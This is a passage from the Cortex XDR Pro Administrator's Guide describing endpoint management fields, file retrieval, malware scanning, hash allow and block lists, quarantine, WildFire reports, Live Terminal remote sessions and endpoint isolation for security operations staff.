• Uninstall Agent
• Delete Endpoint
• Disable Capabilities (Live Terminal, Script Execution, and File Retrieval)

Security Operations • Retrieve Endpoint Files

• Initiate Malware Scan
• Abort Malware Scan
• Initiate Live Terminal
• Isolate Endpoint

Endpoint Data • View Incidents (in same tab or new tab)

• View Endpoint Policy
• View Actions
• View Endpoint Logs

The following table describes both the default and additional optional fields that you can view in the
Endpoints table and lists. The table lists the fields in alphabetical order.

Field Description

Check box to select one or more endpoints on which to perform actions.

Active Directory Lists all Active Directory Groups and Organizational Units to which the user
belongs.

Assigned Policy Policy assigned to the endpoint.

Auto Upgrade Status When Agent Auto Upgrades are enabled, indicates the action status is either:
• In progress—Indicates that the Cortex XDR agent upgrade is in progress
on the endpoint.
• Up to date—Indicates that the current Cortex XDR agent version on the
endpoint is up to date.
• Failure—Indicates that the Cortex XDR agent upgrade failed after three
retries.
• Not configured—Indicates that automatic agent upgrades are not
configured for this endpoint.
• Pending—Indicates that the Cortex XDR agent version running on the
endpoint is not up to date, and the agent is waiting for the upgrade
message from Cortex XDR.

272 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Field Description
• Not supported—Indicates this endpoint type does not support automatic
agent upgrades. Relevant for VDI, TS, or Android endpoints.

Content Auto Update Indicates whether automatic content updates are Enabled or Disabled for the
endpoint. See Agent Settings profile.

Content Rollout Delay If you configured delayed content rollout, the number of days for delay is
(days) displayed here. See Agent Settings profile.

Content Version Content update version used with the Cortex XDR agent.

Disabled Capabilities A list of the capabilities that were disabled on the endpoint. To disable one or
more capabilities, right-click the endpoint name and select Endpoint Control >
Disable Capabilities. Options are:
• Live Terminal
• Script Execution
• File Retrieval
You can disable these capabilities during the Cortex XDR agent installation
on the endpoint or through Endpoint Administration. Disabling any of
these actions is irreversible, so if you later want to enable the action on the
endpoint, you must uninstall the Cortex XDR agent and install a new package
on the endpoint.

Domain Domain or workgroup to which the endpoint belongs, if applicable.

Endpoint Alias If you assigned an alias to represent the endpoint in Cortex XDR, the alias
is displayed here. To set an endpoint alias, right-click the endpoint name,
and select Change endpoint alias. The alias can contain any of the following
characters: a-Z, 0-9, !@#$%^&()-'{}~_.

Endpoint ID Unique ID assigned by Cortex XDR that identifies the endpoint.

Endpoint Isolated Isolation status, either:

• Isolated—The endpoint has been isolated from the network with
communication permitted to only Cortex XDR and to any IP addresses and
processes included in the allow list.
• Not Isolated—Normal network communication is permitted on the
endpoint.
• Pending Isolation—The isolation action has reached the server and is
pending contact with the endpoint.
• Pending Isolation Cancellation—The cancel isolation action has reached
the server and is pending contact with the endpoint.

Endpoint Name Hostname of the endpoint. If the agent enables Pro features, this field also
includes a PRO badge.

Endpoint Status Registration status of the Cortex XDR agent on the endpoint:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 273

© 2020 Palo Alto Networks, Inc.
 Field Description
• Connected—The Cortex XDR agent has checked in within 10 minutes for
standard endpoints, and within 3 hours for mobile endpoints.
• Connection Lost—The Cortex XDR agent has not checked in within 30 to
180 days for standard endpoints, and between 90 minutes and 6 hours for
VDI and temporary sessions.
• Disconnected—The Cortex XDR agent has checked in within the defined
inactivity window: between 10 minutes and 30 days for standard and
mobile endpoints, and between 10 minutes and 90 minutes for VDI and
temporary sessions.
• VDI Pending Log-on—(Windows only) Indicates a non-persistent VDI
endpoint is waiting for user logon, after which the Cortex XDR agent
consumes a license and starts enforcing protection.
• Uninstalled—The Cortex XDR agent has been uninstalled from the
endpoint.

Endpoint Type Type of endpoint: Mobile, Server, or Workstation.

Endpoint Version Versions of the Cortex XDR agent that runs on the endpoint.

First Seen Date and time the Cortex XDR agent first checked in (registered) with Cortex
XDR.

Golden Image ID For endpoints with a System Type of Golden Image, the image ID is a unique
identifier for the golden image.

Group Names Endpoint Groups to which the endpoint is a member, if applicable. See Define
Endpoint Groups.

Incompatibility Mode Cortex XDR agent incompatibility status, either:

• Agent Incompatible—The Cortex XDR agent is incompatible with the
environment and cannot recover.
• OS Incompatible—The Cortex XDR agent is incompatible with the
operating system.
When Cortex XDR agents are compatible with the operating system and
environment, this field is blank.

Isolation Date Date and time of when the endpoint was Isolated. Displayed only for
endpoints in Isolated or Pending Isolation Cancellation status.

Install Date Date and time at which the Cortex XDR agent was first installed on the
endpoint.

Installation Package Installation package name used to install the Cortex XDR agent.

Installation Type Type of installation:

• Standard
• VDI

274 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Field Description
• Golden Image
• Temporary Session

IP Last known IPv4 or IPv6 address of the endpoint.

Is EDR Enabled Whether EDR data is enabled on the endpoint.

Last Scan Date and time of the last malware scan on endpoint.

Last Seen Date and time of the last change in an agent's status. This can occur when
Cortex XDR receives a periodic status report from the agent (once an hour), a
user performed a manual Check In, or a security event occurred.

Changes to the agent status can take up to ten minutes to

display on the Cortex XDR.

Last Used Proxy The IP address and port number of proxy that was last used for
communication between the agent and Cortex XDR.

Last Used Proxy Port Last proxy port used on endpoint.

MAC The endpoint MAC address that corresponds to the IP address.

Network Location (Cortex XDR agent 7.1 and later for Windows and Cortex XDR agent 7.2 and
later for macOS and Linux) Endpoint location as reported by the Cortex XDR
agent:
• Internal
• External
• Not Supported—The Cortex XDR agent is running a prior agent version
that does not support network location reporting.
• Disabled—The Cortex XDR agent was unable to identify the network
location.

Operating System Name of operating system.

Operational Status Cortex XDR agent operational status:

• Protected—Indicates that the Cortex XDR agent is running as configured
and did not report any exceptions to Cortex XDR.
• Partially protected—Indicates that the Cortex XDR agent reported Cortex
XDR one or more exceptions.
• Unprotected—Indicates the Cortex XDR agent was shut down.

OS Description Operating system version name.

OS Type Name of the operating system.

OS Version Operating system version number.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 275

© 2020 Palo Alto Networks, Inc.
 Field Description

Platform Platform architecture.

Proxy IP address and port number of the configured proxy server.

Scan Status Malware scan status, either:

• None—No scan initiated
• Pending—Scan was initiated, waiting for action to reach endpoint.
• In Progress—Scan in process.
• Success—Scan completed.
• Pending Cancellation—Scan was aborted, waiting for action to reach
endpoint.
• Canceled—Scan canceled.
• Error—Scan failed to run.

Users User that was last logged into the endpoint. On Android endpoints, the
Cortex XDR app identifies the user from the email prefix specified during app
activation.

Retrieve Files from an Endpoint

If during investigation you want to retrieve files from one or more endpoints, you can initiate a files retrieval
request from Cortex XDR.
For each files retrieval request, Cortex XDR supports up to:
• 20 files
• 500MB in total size
• 10 different endpoints
The request instructs the agent to locate the files on the endpoint and upload them to Cortex XDR. The
agent collects all requested files into one archive and includes a log in JSON format containing additional
status information. When the files are successfully uploaded, you can download them from the Action
Center.
To retrieve files from one or more endpoints:

STEP 1 | Log in to Cortex XDR.

Go to Response > Action Center > + New Action.

STEP 2 | Select Files Retrieval and click Next.

STEP 3 | Select the operating system and enter the paths for the files you want to retrieve, pressing
ADD after each completed path.

276 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 You cannot define a path using environment variables on Mac and Linux endpoints.

STEP 4 | Click Next.

STEP 5 | Select the target endpoints (up to 10) from which you want to retrieve files.

If needed, Filter the list of endpoints. For more information, refer to Filter Page Results.

STEP 6 | Click Next.

STEP 7 | Review the action summary and click Done when finished.
To track the status of a files retrieval action, return to the Action Center. Cortex XDR retains retrieved
files for up to 30 days.
If at any time you need to cancel the action, you can right-click it and select Cancel for pending
endpoint. You can cancel the retrieval action only if the endpoint is still in Pending status and no
files have been retrieved from it yet. The cancellation does not affect endpoints that are already in the
process of retrieving files.

STEP 8 | To view additional data and download the retrieved files, right-click the action and select
Additional data.
This view displays all endpoints from which files are being retrieved, including their IP Address, Status,
and Additional Data such as error messages of names of files that were not retrieved.

STEP 9 | When the action status is Completed Successfully, you can right-click the action and
download the retrieved files logs.
Cortex XDR retains retrieved files for up to 30 days.

Disable File Retrieval

If you want to prevent Cortex XDR from retrieving files from an endpoint running the Cortex XDR
agent, you can disable this capability during agent installation or later on through Cortex XDR Endpoint
Administration. Disabling script execution is irreversible. If you later want to re-enable this capability on the
endpoint, you must re-install the Cortex XDR agent. See the Cortex XDR agent administrator’s guide for
more information.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 277

© 2020 Palo Alto Networks, Inc.
 Disabling File Retrieval does not take effect on file retrieval actions that are in progress.

Retrieve Support Logs from an Endpoint

When you need to send additional forensic data to Palo Alto Networks Technical Support, you can initiate
a request to retrieve all support logs and alert data dump files from an endpoint. After Cortex XDR receives
the logs, you can then download and send them to Technical Support.

STEP 1 | Log in to Cortex XDR.

Go to Response > Action Center > + New Action.

STEP 2 | Select Retrieve Support File and click Next.

STEP 3 | Select the target endpoints (up to 10) from which you want to retrieve logs.

If needed, Filter the list of endpoints. For more information, refer to Filter Page Results.

STEP 4 | Click Next.

STEP 5 | Review the action summary and click Done when finished.
In the next heart beat, the agent will retrieve the request to package and send all logs to Cortex XDR.

STEP 6 | To track the status of a support log retrieval action, return to the Action Center.
When the status is Completed Successfully, you can right-click the action and download the
support logs. Cortex XDR retains retrieved files for up to 30 days.
If at any time you need to cancel the action, you can right-click it and select Cancel for pending
endpoint. You can cancel the retrieval action only if the endpoint is still in Pending status and no
files have been retrieved from it yet. The cancellation does not affect endpoints that are already in the
process of retrieving files.

STEP 7 | To view additional data and download the support logs, right-click the action and select
Additional data.
You will see all endpoints from which files are being retrieved, including their IP Address, Status, and
Additional Data.

STEP 8 | When the action status is Completed Successfully, you can right-click the action and
download the retrieved logs.
Cortex XDR retains retrieved files for up to 30 days.

Scan an Endpoint for Malware

In addition to blocking the execution of malware, the Cortex XDR agent can scan your Windows and Mac
endpoints and attached removable drives for dormant malware that is not actively attempting to run. The
Cortex XDR agent examines the files on the endpoint according to the Malware security profile that is in
effect on the endpoint (quarantine settings, unknown file upload, etc.) When a malicious file is detected
during the scan, the Cortex XDR agent reports the malware to Cortex XDR so that you can manually take
additional action to remove the malware before it is triggered and attempts to harm the endpoint.

278 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 You can scan the endpoint in the following ways:
• System scan—Initiate a full scan on demand from Endpoints Administration for an endpoint. To initiate a
system scan, see Initiate a Full Scan from Cortex XDR
• Periodic scan—Configure periodic full scans that run on the endpoint as part of the malware security
profile. To configure periodic scans, see Add a New Malware Security Profile.
• Custom scan—(Windows, requires a Cortex XDR agent 7.1 or later release) The end user can initiate a
scan on demand to examine a specific file or folder. For more information, see the Cortex XDR agent
administrator’s guide for Windows.

Initiate a Full Scan from Cortex XDR

You can initiate full scans of one or more endpoints from either Endpoint Administration or the Action
Center. After initiating a scan, you can monitor the progress from Response > Action Center. From both
locations, you can also abort an in-progress scan. The time a scan takes to complete depends on the number
of endpoints, connectivity to those endpoints, and the number of files for which Cortex XDR needs to
obtain verdicts.
To initiate a scan from Cortex XDR:

STEP 1 | Log in to Cortex XDR.

Select Response > Action Center > +New Action.

STEP 2 | Select Malware Scan.

STEP 3 | Click Next.

STEP 4 | Select the target endpoints (up to 100) on which you want to scan for malware.
Scanning is available on Windows and Mac endpoints only. Cortex XDR automatically filters out any
endpoints for which scanning is not supported. Scanning is also not available for inactive endpoints.

If needed, Filter the list of endpoints by attribute or group name.

STEP 5 | Click Next.

STEP 6 | Review the action summary and click Done when finished.
Cortex XDR initiates the action at the next heart beat and sends the request to the agent to initiate a
malware scan.

STEP 7 | To track the status of a scan, return to the Action Center.

When the status is Completed Successfully, you can view the scan results.

STEP 8 | View the scan results.

After a Cortex XDR agent completes a scan, it reports the results to Cortex XDR.
To view the scan results for a specific endpoint:
1. On Action Center, when the scan status is complete, right-click the scan action and select Additional
data.
Cortex XDR displays additional details about the endpoint.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 279

© 2020 Palo Alto Networks, Inc.
 2. Right-click the endpoint for which you want to view the scan results and select View related security
events.
Cortex XDR displays a filtered list of malware alerts for files that were detected on the endpoint
during the scan.

280 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Investigate Files
• Manage File Execution
• Manage Quarantined Files
• Review WildFire Analysis Details
• Investigate Hash View

Manage File Execution

You can manage file execution on your endpoints using file hashes included in your allow and block lists. If
you trust a certain file and know it to be benign, you can add the file hash to the allow list and allow it to be
executed on all your endpoints regardless of the WildFire or local analysis verdict. Similarly, if you want to
always block a file from running on any of your endpoints, you can add the associated hash to the block list.
Adding files to the block list or allow list takes precedence of any other policy rules that may have otherwise
been applied to these files. In the Action Center in Cortex XDR, you can monitor block list and allow list
actions performed in your networks and add/remove file from these lists.

STEP 1 | Log in to Cortex XDR.

Go to Response > Action Center > + New Action.

STEP 2 | Select either Add to Block List or Add to Allow List.

STEP 3 |
Enter the SHA256 hash of the file and click .
You can add up to 100 file hashes at once. You can add a comment that will be added to all the hashes
you added in this action.

STEP 4 | Click Next.

STEP 5 | Review the summary and click Done.

In the next heart beat, the agent will retrieve the updated lists from Cortex XDR.

STEP 6 | You are automatically redirected to the Block List or Allow List that corresponds to the action
in the Action Center.

STEP 7 | To manage the file hashes on the Block List or the Allow List, right-click the file and select one
of the following:
• Disable—The file hash remains on the list but will not be applied on your Cortex XDR agents.
• Move to Block List or Move to Allow List—Removes this file hash from the current list and adds it to
the opposite one.
• Edit Incident ID—Select to either Link to existing incident or Remove incident link.
• Edit Comment—Enter a comment.
• Delete—Delete the file hash from the list altogether, meaning this file hash will no longer be applied
to your endpoints.
• Open in VirusTotal—Directs you to the VirusTotal analysis of this hash.
• (Cortex XDR Pro License only) Open Hash View—Pivot the hash view of the hash.
• Open in Quick Launcher—Open the quick launcher search results for the hash.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 281

© 2020 Palo Alto Networks, Inc.
Manage Quarantined Files
When the Cortex XDR agent detects malware on a Windows endpoint, you can take additional precautions
to quarantine the file. When the Cortex XDR agent quarantines malware, it moves the file from the location
on a local or removable drive to a local quarantine folder (%PROGRAMDATA%\Cyvera\Quarantine) where
it isolates the file. This prevents the file from attempting to run again from the same path or causing any
harm to your endpoints.
To evaluate whether an executable file is considered malicious, the Cortex XDR agent calculates a verdict
using information from the following sources in order of priority:
• Hash exception policy
• WildFire threat intelligence
• Local analysis
Quarantining a file in Cortex XDR can be done in one of two ways:
• You can enable the Cortex XDR agent to automatically quarantine malicious executables by configuring
quarantine settings in the Malware security profile.
• You can quarantine a specific file from the causality card.

STEP 1 | View the quarantined files in your network.

282 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Navigate to Response > Action Center > Quarantine. Toggle between DETAILED and AGGREGATED
BY SHA256 views to display information on your quarantined files.

STEP 2 | Review details about quarantined files.

In the Detailed view, filter and review the Endpoint Name, Domain, File Path, Quarantine Source, and
Quarantine Date of the all the quarantined files.
• Right-click one or more rows and select Restore all files by SHA256 to reinstate the selected files.

This will restore all files with the same hash on all of your endpoints.

• In the Hash field, right-click to:

• Open in VirusTotal—Review the quarantined file inspection results on VirusTotal. You will be
redirected in a new browser tab to the VirusTotal site and view all analysis details on the selected
quarantined file.
• Open Hash View—Drill down on each of the process executions, file operations, incidents, actions,
and threat intelligence reports relating to the hash.
• Open in Quick Launcher—Search for where the hash value appears in Cortex XDR.
• Export to file a detailed list of the quarantined hashes in a TSV format.
In the Aggregated by SHA256 view, filter and review the Hash, File Name, File Path, and Scope of all
the quarantined files.
• Right-click a row and select Additional Data to open the Quarantine Details page detailing the
Endpoint Name, Domain, File Path, Quarantine Source, and Quarantine Date of a specific file hash.
• Right-click and select Restore to reinstate one or more of the selected file hashes.
• In the Hash field, right-click to:
• Open in VirusTotal—Review the quarantined file inspection results on VirusTotal. You will be
redirected in a new browser tab to the VirusTotal site and view all analysis details on the selected
quarantined file.
• Open Hash View—Drill down on each of the process executions, file operations, incidents,actions,
and threat intelligence reports relating to the hash.
• Open in Quick Launcher—Search for where the hash value appears in Cortex XDR.

Review WildFire Analysis Details

For each file, Cortex XDR receives a file verdict and the WildFire Analysis Report. This report contains
the detailed sample information and behavior analysis in different sandbox environments, leading to the
WildFire verdict. You can use the report to assess whether the file poses a real threat on an endpoint. The
details in the WildFire analysis report for each event vary depending on the file type and the behavior of the
file.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 283

© 2020 Palo Alto Networks, Inc.
 • Drill down into the WildFire Analysis Details.
WildFire analysis details are available for files that receive a WildFire verdict. The Analysis Reports
section includes the WildFire analysis for each testing environment based on the observed behavior for
the file.
1. Open the WildFire report.
If you are analyzing an incident, right-click the incident and View Incident. From the Key Artifacts
involved in the incident, select the file for which you want to view the WildFire report and open ( ).
Alternatively, if you are analyzing an alert, right-click the alert and Analyze. You can open ( ) the
WildFire report of any file included in the alert Causality Chain.

Cortex XDR displays the preview of WildFire reports that were generated within the
last couple of years only. To view a report that was generated more than two years
ago, you can Download the WildFire report.
2. Analyze the WildFire report.
On the left side of the report you can see all the environments in which the Wildfire service tested
the sample. If a file is low risk and WildFire can easily determine that it is safe, only static analysis is
performed on the file. Select the testing environment on the left, for example Windows 7 x64 SP1,
to review the summary and additional details for that testing environment. To learn more about the
behavior summary, see WildFire Analysis Reports—Close Up.
3. (Optional) Download the WildFire report.

If you want to download the WildFire report as it was generated by the WildFire service, click ( ).
The report is downloaded in PDF format.

• Report an incorrect verdict to Palo Alto Networks.

284 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
If you know the WildFire verdict is incorrect, for example WildFire assigned a Malware verdict to a file
you wrote and know to be Benign, you can report an incorrect verdict to Palo Alto Networks to request
the verdict change.
1. Review the report information and verify the verdict that you are reporting.
2.
Report ( ) the verdict to Palo Alto Networks.

3. Suggest a different Verdict for the hash.

4. Enter any details that may help us to better understand why you disagree with the verdict.
5. Enter an email address to receive an email notification after Palo Alto Networks completes the
additional analysis.
6. After you enter all the details, click OK.
From this point on, the threat team will perform further analysis on the sample to determine if it
should be reclassified. If a malware sample is determined to be safe, the signature for the file is
disabled in an upcoming antivirus signature update or if a benign file is determined to be malicious, a

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 285

© 2020 Palo Alto Networks, Inc.
 new signature is generated. After the investigation is complete, you will receive an email describing
the action that was taken.

Import File Hash Exceptions

The Action Center page displays information on files quarantined and included in the allow list and block
list. To import hashes from the Endpoint Security Manager or from external feeds, you can initiate an action.

STEP 1 | From Cortex XDR, select Response > Action Center > + New Action

STEP 2 | Select Import Hash Exceptions.

STEP 3 | Drag your Verdict_Override_Exports.csv file to the drop area.

If necessary, resolve any conflicts encountered during the upload and retry.

STEP 4 | Click Next twice.

STEP 5 | Review the action summary, and click Done.

Cortex XDR imports and then distributes your hashes to the allow list and block list based on the
assigned verdict.

286 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Response Actions
After or during the investigation of malicious activity in your network, Cortex XDR offers various response
actions that enable you investigate the endpoint and take immediate action to remediate it. For example,
when you detect a compromised endpoint, you can isolate it from your network to prevent it from
communicating with any other internal or external device and thereby reducing an attacker’s mobility on
your network. The available response actions in Cortex XDR are:
• Initiate a Live Terminal Session
• Isolate an Endpoint
• Run Scripts on an Endpoint
• Remediate Changes from Malicious Activity
• Search and Destroy Malicious Files
• Manage External Dynamic Lists
For response actions that rely on a Cortex XDR agent, the following table describes the supported platforms
and minimal agent version. A dash (—) indicates the setting is not supported.

Module Windows Mac Linux

Initiate a Live Terminal

Session
Cortex XDR agent Cortex XDR agent Cortex XDR agent
Initiates a remote connection 6.1 and later 7.0 and later 7.0 and later
to an endpoint allowing you
to investigate and respond to
security events on endpoints.
Using Live Terminal you
can navigate and manage files
in the file system, manage
active processes, and run the
operating system or Python
commands.

Isolate an Endpoint —
Halts all network access on Cortex XDR agent Cortex XDR agent
the endpoint except for traffic 6.0 and later 7.3 and later on
to Cortex XDR to prevent a macOS 10.15.4 and
compromised endpoint from later
communicating with any other
internal or external device.

Run Scripts on an Endpoint

Allows executing Python 3.7 Cortex XDR agent Cortex XDR agent Cortex XDR agent
scripts on your endpoints 7.1 and later 7.1 and later 7.1 and later
directly from Cortex XDR,
including pre-canned scripts
provided by Cortex XDR or
your own Python scripts and
code snippets.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 287

© 2020 Palo Alto Networks, Inc.
 Module Windows Mac Linux

Remediate Changes from — —

Malicious Activity
Cortex XDR agent
Investigates suspicious 7.2 and later
causality process chains
and incidents on your
endpoints, and displays a
list of suggested actions to
remediate processes, files and
registry keys on your endpoint
that were changed as a result
of malicious activity.

Search and Destroy Malicious —

Files
Cortex XDR agent Cortex XDR agent
Searches for the presence 7.2 and later 7.3 and later on
of known and suspected macOS 10.15.4 and
malicious files on endpoints later
and destroys the file from
endpoints where it exists.

Response actions are not supported for Android endpoints.

Initiate a Live Terminal Session

To investigate and respond to security events on endpoints, you can use the Live Terminal to initiate
a remote connection to an endpoint. The Cortex XDR agent facilitates the connection using a remote
procedure call. Live Terminal enables you to manage remote endpoints. Investigative and response actions
that you can perform include the ability to navigate and manage files in the file system, manage active
processes, and run the operating system or Python commands.
Live Terminal is supported for endpoints that meet the following requirements:

Operating System Requirements

Windows • Traps 6.1 or a later release

• Windows 7 SP1 or a later release
• Windows update patch for WinCRT (KB 2999226)—To verify the Hotfixes
that are installed on the endpoint, run the systeminfo command from a
command prompt.
• PowerShell 5.0 or a later release
• Endpoint activity reported within the last 90 minutes (as identified by the
Last Seen time stamp in the endpoint details).

Mac • Cortex XDR agent 7.0 or a later release

• macOS 10.12 or a later release
• Endpoint activity reported within the last 90 minutes (as identified by the
Last Seen time stamp in the endpoint details).

288 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Operating System Requirements

Linux • Cortex XDR agent 7.0 or a later release

• Any Linux supported release
• Endpoint activity reported within the last 90 minutes (as identified by the
Last Seen time stamp in the endpoint details).

If the endpoint supports the necessary requirements, you can initiate a Live Terminal session from the
Endpoints page. You can also initiate a Live Terminal as a response action from a security event. If the
endpoint is inactive or does not meet the requirements, the option is disabled.
After you terminate the Live Terminal session, you also have the option to save a log of the session activity.
All logged actions from the Live Terminal session are available for download as a text file report when you
close the live terminal session.
You can fine tune the Live Terminal session visibility on the endpoint by adjusting the User Interface
options in your Agent Settings Profile.

STEP 1 | Start the session.

From a security event or endpoint details, select Response > Live Terminal. It can take the Cortex XDR
agent a few minutes to facilitate the connection.

STEP 2 | Use the Live Terminal to investigate and take action on the endpoint.
• Manage Processes
• Manage Files
• Run Operating System Commands
• Run Python Commands and Scripts

STEP 3 | When you are done, Disconnect the Live Terminal session.
You can optionally save a session report containing all activity you performed during the session.
The following example displays a sample session report:

Live Terminal Session Summary

Initiated by user [email protected] on target TrapsClient1 at
Jun 27th 2019 14:17:45

Jun 27th 2019 13:56:13 Live Terminal session has started [success]
Jun 27th 2019 14:00:45 Kill process calc.exe (4920) [success]
Jun 27th 2019 14:11:46 Live Terminal session end request [success]
Jun 27th 2019 14:11:47 Live Terminal session has ended [success]

No artifacts marked as interesting

Manage Processes
From the Live Terminal you can monitor processes running on the endpoint. The Task Manager displays
the task attributes, owner, and resources used. If you discover an anomalous process while investigating
the cause of a security event, you can take immediate action to terminate the process or the whole process
tree, and block processes from running.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 289

© 2020 Palo Alto Networks, Inc.
STEP 1 | From the Live Terminal session, open the Task Manager to navigate the active processes on
the endpoint.

You can toggle between a sorted list of processes and the default process tree view ( ). You can also
export the list of processes and process details to a comma-separated values file.
If the process is known malware, the row displays a red indicator and identifies the file using a malware
attribute.

STEP 2 | To take action on a process, right-click the process:

• Terminate process—Terminate the process or entire process tree.
• Suspend process—To stop an attack while investigating the cause, you can suspend a process or
process tree without killing it entirely.
• Resume process—Resume a suspended process.
• Open in VirusTotal—VirusTotal aggregates known malware from antivirus products and online scan
engines. You can scan a file using the VirusTotal scan service to check for false positives or verify
suspected malware.
• Get WildFire verdict—WildFire evaluates the file hash signature to compare it against known threats.
• Get file hash—Obtain the SHA256 hash value of the process.
• Download Binary—Download the file binary to your local host for further investigation and analysis.
You can download files up to 200MB in size.
• Mark as Interesting—Add an Interesting tag to a process to easily locate the process in the session
report after you end the session.
• Remove from Interesting—If no threats are found, you can remove the Interesting tag.
• Copy Value—Copy the cell value to your clipboard.

STEP 3 | Select Disconnect to end the Live Terminal session.

Choose whether to save the remote session report including files and tasks marked as interesting.
Administrator actions are not saved to the endpoint.

Manage Files
The File Explorer enables you to navigate the file system on the remote endpoint and take remedial action
to:
• Create, manage (move or delete), and download files, folders, and drives, including connected external
drives and devices such as USB drives and CD-ROM.

Network drives are not supported.

• View file attributes, creation and last modified dates, and the file owner.
• Investigate files for malicious content.
To navigate and manage files on a remote endpoint:

STEP 1 | From the Live Terminal session, open the File Explorer to navigate the file system on the
endpoint.

STEP 2 | Navigate the file directory on the endpoint and manage files.
To locate a specific file, you can:
• Search for any filename rows on the screen from the search bar.
• Double click a folder to explore its contents.

290 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
STEP 3 | Perform basic management actions on a file.
• View file attributes
• Rename files and folders
• Export the table as a CSV file
• Move and delete files and folders

STEP 4 | Investigate files for malware.

Right-click a file to take investigative action. You can take the following actions:
• Open in VirusTotal—VirusTotal aggregates known malware from antivirus products and online scan
engines. You can scan a file using the VirusTotal scan service to check for false positives or verify
suspected malware.
• Get WildFire verdict—WildFire evaluates the file hash signature to compare it against known threats.
• Get file hash—Obtain the SHA256 hash value of the file.
• Download Binary—Download the file binary to your local host for further investigation and analysis.
You can download files up to 200MB in size.
• Mark as Interesting—Add an Interesting tag to any file or directory to easily locate the file. The files
you tag are recorded in the session report to help you locate them after you end the session.
• Remove from Interesting—If no threats are found, you can remove the Interesting tag.
• Copy Value—Copies the cell value to your clipboard.

STEP 5 | Select Disconnect to end the live terminal session.

Choose whether to save the live terminal session report including files and tasks marked as interesting.
Administrator actions are not saved to the endpoint.

Run Operating System Commands

The Live Terminal provides a command-line interface from which you can run operating system commands
on a remote endpoint. Each command runs independently and is not persistent. To chain multiple
commands together so as to perform them in one action, use && to join commands. For example:

cd c:\windows\temp\ && <command1> && <command2>

On Windows endpoints, you cannot run GUI-based cmd commands like winver or
appwiz.cpl

STEP 1 | From the Live Terminal session, select Command Line.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 291

© 2020 Palo Alto Networks, Inc.
STEP 2 | Run commands to manage the endpoint.
Examples include file management or launching batch files. You can enter or paste the commands, or
you can upload a script. After you are done, you can save the command session output to a file.

STEP 3 | When you are done, Disconnect the Live Terminal session.
Choose whether to save the live terminal session report including files and tasks marked as interesting.
Administrator actions are not saved to the endpoint.

Run Python Commands and Scripts

The Live Terminal provides a Python command line interface that you can use to run Python commands and
scripts.
The Python command interpreter uses Unix command syntax and supports Python 3 with standard Python
libraries. To issue Python commands or scripts on the endpoint, follow these steps:

STEP 1 | From the Live Terminal session, select Python to start the python command interpreter on the
remote endpoint.

STEP 2 | Run Python commands or scripts as desired.

You can enter or paste the commands, or you can upload a script. After you are done, you can save the
command session output to a file.

STEP 3 | When you are done, Disconnect the Live Terminal session.
Choose whether to save the live terminal session report including files and tasks marked as interesting.
Administrator actions are not saved to the endpoint.

292 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Disable Live Terminal Sessions
If you want to prevent Cortex XDR from initiating Live Terminal remote sessions on an endpoint running
the Cortex XDR agent, you can disable this capability during agent installation or later on through Cortex
XDR Endpoint Administration. Disabling script execution is irreversible. If you later want to re-enable this
capability on the endpoint, you must re-install the Cortex XDR agent.

Disabling Live Terminal does not take effect on sessions that are in progress.

Isolate an Endpoint
When you isolate an endpoint, you halt all network access on the endpoint except for traffic to Cortex XDR.
This can prevent a compromised endpoint from communicating with other endpoints thereby reducing
an attacker’s mobility on your network. After the Cortex XDR agent receives the instruction to isolate the
endpoint and carries out the action, the Cortex XDR console shows an Isolated check-in status. To ensure
an endpoint remains in isolation, agent upgrades are not available for isolated endpoints.
Network isolation is supported for endpoints that meet the following requirements:

Operating System Prerequisites

Windows • A Cortex XDR agent 6.0 or a later release

• (VDI) Configure your network isolation allow list in the Agent
Settings Profile to ensure VDI sessions remain uniterrupted.

Mac • A Cortex XDR agent 7.3 or a later release

• macOS 10.15.4 or a later release
• Ensure the Cortex XDR Network extension is enabled on the
endpoint.
Network isolation on Mac endpoints does not terminate active
connections that were initiated before the Cortex XDR agent was
installed on the endpoint.

STEP 1 | From Cortex XDR, initiate an action to isolate an endpoint.

Go to Response > Action Center > + New Action and select Isolate.
You can also initiate the action (for one or more endpoints) from the Isolation page of the Action Center
or from Endpoints > Endpoint Management > Endpoint Administration.

STEP 2 | Select Isolate.

STEP 3 | Enter a Comment to provide additional background or other information that explains why you
isolated the endpoint.
After you isolate an endpoint, Cortex XDR will display the Isolation Comment on the Action Center >
Isolation. If needed, you can edit the comment from the right-click pivot menu.

STEP 4 | Click Next.

STEP 5 | Select the target endpoint that you want to isolate from your network.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 293

© 2020 Palo Alto Networks, Inc.
 If needed, Filter the list of endpoints. To learn how to use the Cortex XDR filters, refer to
Filter Page Results.

